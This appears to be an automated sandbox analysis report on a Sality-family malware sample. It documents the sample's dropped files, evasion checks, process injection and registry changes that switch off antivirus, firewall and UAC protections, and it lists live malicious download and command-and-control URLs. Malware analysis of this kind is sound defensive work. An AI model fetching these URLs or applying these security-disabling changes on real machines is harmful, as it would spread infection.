Source: C:\Users\user\Desktop\1.0.0.2.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 300000
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 360000
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 2100000
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\winmefmb.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe | Dropped PE file which has not been started: C:\iuepn.exe
Source: C:\Users\user\Desktop\1.0.0.2.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\VF.dll
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes graph_2-923
Source: C:\Users\user\Desktop\1.0.0.2.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes graph_0-7166
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 6272 | Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 4996 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 1524 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 2448 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3180 | Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300 | Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300 | Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 4996 | Thread sleep time: -2100000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe TID: 3300 | Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\Desktop\1.0.0.2.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 005B1754h
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B6BADD Sleep,FindFirstFileA,FindNextFileA,Sleep
Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B657A0 FindFirstFileA,FindNextFileA,Sleep
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 120000
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 300000
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 360000
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 2100000
Source: C:\Users\user\Desktop\1.0.0.2.exe | Thread delayed: delay time: 360000
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
          Source: Amcache.hve.2.drBinary or memory string: VMware
          Source: dwm.exe, 00000007.00000002.3403250038.000001D156AA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
          Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
          Source: rksowY.exe, 00000002.00000002.2243579607.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000BAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpi
          Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.2.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
          Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266166178.0000000001172000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266166178.0000000001172000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk<=
          Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.2.drBinary or memory string: vmci.sys
          Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.2.drBinary or memory string: VMware20,1
          Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: dwm.exe, 00000007.00000002.3403250038.000001D156B0A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B6B000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWengineer
          Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\1.0.0.2.exeAPI call chain: ExitProcess graph end nodegraph_0-7250
          Source: C:\Users\user\Desktop\1.0.0.2.exeAPI call chain: ExitProcess graph end nodegraph_0-7364
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exeAPI call chain: ExitProcess graph end nodegraph_2-898
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_02BEBCD0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_02BEBCD0
          Source: C:\Users\user\Desktop\1.0.0.2.exeCode function: 0_2_00D63044 mov eax, dword ptr fs:[00000030h]0_2_00D63044
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\1.0.0.2.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\1.0.0.2.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: AD0000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: DE0000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 380000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B6CC92 LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,FindCloseChangeNotification,GetTokenInformation,GetTokenInformation,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,FindCloseChangeNotification, 0_2_02B6CC92
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Memory written: C:\Windows\System32\fontdrvhost.exe base: AD0000
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Memory written: C:\Windows\System32\fontdrvhost.exe base: DE0000
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Memory written: C:\Windows\System32\dwm.exe base: 380000
          Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
          Source: dwm.exe, 00000007.00000002.3405771317.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000007.00000000.2226927771.000001D159439000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Program Manager
          Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: SciTE.exe.2.dr | Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
          Source: dwm.exe, 00000007.00000002.3402120107.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000007.00000000.2165032410.000001D154AB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv, 2_2_005B1718
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B61B0E GetUserNameA,RegOpenKeyExA,RegCreateKeyA,GlobalAlloc,GlobalFree, 0_2_02B61B0E
          Source: C:\Users\user\AppData\Local\Temp\rksowY.exe | Code function: 2_2_005B139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, 2_2_005B139F

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Users\user\Desktop\1.0.0.2.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShell
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc (this entry is repeated 29 times in the report)
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotifications
          Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | Registry value created: DisableNotifications 1
          Source: Amcache.hve.2.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.2.dr | Binary or memory string: msmpeng.exe
          Source: Amcache.hve.2.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.2.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
          Source: Amcache.hve.2.dr | Binary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          Source: Yara match | File source: Process Memory Space: rksowY.exe PID: 5344, type: MEMORYSTR

          Remote Access Functionality

          Source: Yara match | File source: Process Memory Space: rksowY.exe PID: 5344, type: MEMORYSTR
          Source: C:\Users\user\Desktop\1.0.0.2.exe | Code function: 0_2_02B63911 socket,setsockopt,bind,recvfrom, 0_2_02B63911
          MITRE ATT&CK Matrix (the 14-column matrix was flattened in extraction; listed below, per tactic, are the techniques the report flagged for this sample, with the count shown next to each technique in the matrix; tactics with no flagged technique are Reconnaissance, Resource Development and Exfiltration)

          Initial Access: Replication Through Removable Media (11)
          Execution: Native API (3)
          Persistence: DLL Side-Loading (1); Windows Service (1)
          Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (32)
          Defense Evasion: Disable or Modify Tools (6); Obfuscated Files or Information (21); Software Packing (121); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (32)
          Credential Access: Credential API Hooking (1); Input Capture (11)
          Discovery: System Time Discovery (11); Peripheral Device Discovery (1); Account Discovery (1); File and Directory Discovery (5); System Information Discovery (13); Security Software Discovery (121); Virtualization/Sandbox Evasion (31); Process Discovery (3); System Owner/User Discovery (1)
          Lateral Movement: Taint Shared Content (1)
          Collection: Archive Collected Data (1); Credential API Hooking (1); Input Capture (11)
          Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Standard Port (11); Non-Application Layer Protocol (3); Application Layer Protocol (13)
          Impact: Inhibit System Recovery (1)
          Behavior Graph (ID: 1467981, Sample: 1.0.0.2.exe, Startdate: 05/07/2024, Architecture: WINDOWS, Score: 100). The interactive graph and its legend were lost in extraction; the node contents are rendered here as a process tree (the bracketed numbers are the per-process counters shown on the graph nodes):

          Top level
            DNS/IP: www.careerdesk.org; g2.arrowhitech.com; 7 other IPs or domains
            Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 13 other signatures
            Process: 1.0.0.2.exe started [190 25]
              DNS/IP: ahmediye.net 78.46.2.155, 49718, 49725, 80 HETZNER-ASDE Germany; www.careerdesk.org 54.244.188.177, 49712, 49720, 80 AMAZON-02US United States; 2 other IPs or domains
              Dropped files: C:\iuepn.exe, PE32; C:\Users\user\Desktop\VF.dll, PE32; C:\Users\user\AppData\Local\...\winmefmb.exe, PE32; 2 other malicious files
              Signatures: Creates autorun.inf (USB autostart); Changes security center settings (notifications, updates, antivirus, firewall); Contains functionality to inject threads in other processes; 8 other signatures
              Process: rksowY.exe started [14]
                DNS/IP: arthur.niria.biz 44.221.84.105, 49710, 49715, 49716 AMAZON-AESUS United States
                Dropped files: C:\Program Files\7-Zip\Uninstall.exe, PE32; C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32; C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS
                Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); 2 other signatures
                Process: WerFault.exe started [2]
              Process: fontdrvhost.exe injected
              Process: fontdrvhost.exe injected
              Process: dwm.exe injected

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample
          Source | Detection | Scanner | Label
          1.0.0.2.exe | 86% | Virustotal |
          1.0.0.2.exe | 100% | Avira | W32/Sality.AT
          1.0.0.2.exe | 100% | Joe Sandbox ML |

          Dropped Files
          Source | Detection | Scanner | Label
          C:\Program Files\7-Zip\Uninstall.exe | 100% | Avira | W32/Jadtre.B
          C:\iuepn.exe | 100% | Avira | W32/Sality.AT
          C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Avira | W32/Jadtre.B
          C:\Users\user\AppData\Local\Temp\rksowY.exe | 100% | Avira | TR/Dldr.Small.Z.haljq
          C:\Users\user\AppData\Local\Temp\winmefmb.exe | 100% | Avira | W32/Sality.AT
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Jadtre.B
          C:\Program Files\7-Zip\Uninstall.exe | 100% | Joe Sandbox ML |
          C:\iuepn.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Temp\rksowY.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Temp\winmefmb.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Temp\rksowY.exe | 100% | ReversingLabs | Win32.Trojan.Skeeyah
          C:\Users\user\Desktop\VF.dll | 26% | ReversingLabs |

          Unpacked PE Files
          No Antivirus matches
          Domains
          Source | Detection | Scanner | Label
          www.careerdesk.org | 12% | Virustotal |
          ddos.dnsnb8.net | 12% | Virustotal |
          ampyazilim.com.tr | 0% | Virustotal |
          apple-pie.in | 14% | Virustotal |
          arthur.niria.biz | 11% | Virustotal |
          ahmediye.net | 9% | Virustotal |
          g2.arrowhitech.com | 3% | Virustotal |
          amsamex.com | 8% | Virustotal |
          althawry.org | 12% | Virustotal |
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed;00%Avira URL Cloudsafe
          http://www.lua.org0%Avira URL Cloudsafe
          http://ddos.dnsnb8.net/100%Avira URL Cloudmalware
          http://g2.arrowhitech.com/xs.jpg100%Avira URL Cloudmalware
          http://ddos.dnsnb8.net:799/cj//k1.rarp100%Avira URL Cloudmalware
          http://ampyazilim.com.tr/images/xs2.jpg?1.0%Avira URL Cloudsafe
          http://kukutrustnet777888.info/100%Avira URL Cloudphishing
          http://pan.baidu.com/s/1qWKD5ve0%Avira URL Cloudsafe
          http://89.119.67.154/testo5/100%Avira URL Cloudmalware
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=1604234300%Avira URL Cloudsafe
          http://g2.arrowhitech.com/xs.jpg?6bfcc6=28308248jh70%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.careerdesk.org
          54.244.188.177
          truetrueunknown
          ddos.dnsnb8.net
          44.221.84.105
          truetrueunknown
          ampyazilim.com.tr
          37.230.104.89
          truetrueunknown
          apple-pie.in
          44.221.84.105
          truetrueunknown
          arthur.niria.biz
          44.221.84.105
          truetrueunknown
          ahmediye.net
          78.46.2.155
          truetrueunknown
          amsamex.com
          unknown
          unknowntrueunknown
          althawry.org
          unknown
          unknowntrueunknown
          g2.arrowhitech.com
          unknown
          unknowntrueunknown
          NameMaliciousAntivirus DetectionReputation
          http://www.careerdesk.org/images/xs.jpg?5059c3=10531718true
          • Avira URL Cloud: malware
          unknown
          http://ahmediye.net/xs.jpg?5827cf=5777359true
          • Avira URL Cloud: safe
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?6cbf0c=21380388true
          • Avira URL Cloud: safe
          unknown
          http://ddos.dnsnb8.net:799/cj//k1.rartrue
          • Avira URL Cloud: malware
          unknown
          http://ahmediye.net/xs.jpg?e14213=73812575true
          • Avira URL Cloud: safe
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?1true
          • Avira URL Cloud: safe
          unknown
          http://arthur.niria.biz/xs.jpg?c12b4b=126595310true
          • Avira URL Cloud: malware
          unknown
          http://apple-pie.in/images/xs.jpg?ce2fff=121614327true
          • Avira URL Cloud: phishing
          unknown
          http://apple-pie.in/images/xs.jpg?554c8c=39131092true
          • Avira URL Cloud: phishing
          unknown
          http://arthur.niria.biz/xs.jpg?51fbda=48356010true
          • Avira URL Cloud: malware
          unknown
          http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430true
          • Avira URL Cloud: safe
          unknown
          http://www.careerdesk.org/images/xs.jpg?ad5654=34079484true
          • Avira URL Cloud: malware
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.careerdesk.org/images/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmptrue
          • 9%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://amsamex.com/xs.jpg1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmpfalse
          • 10%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          http://www.activestate.comHolgerSciTE.exe.2.drfalse
          • Avira URL Cloud: safe
          unknown
          http://a3inforservice.com.br/images/logof.gif1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmpfalse
          • 3%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
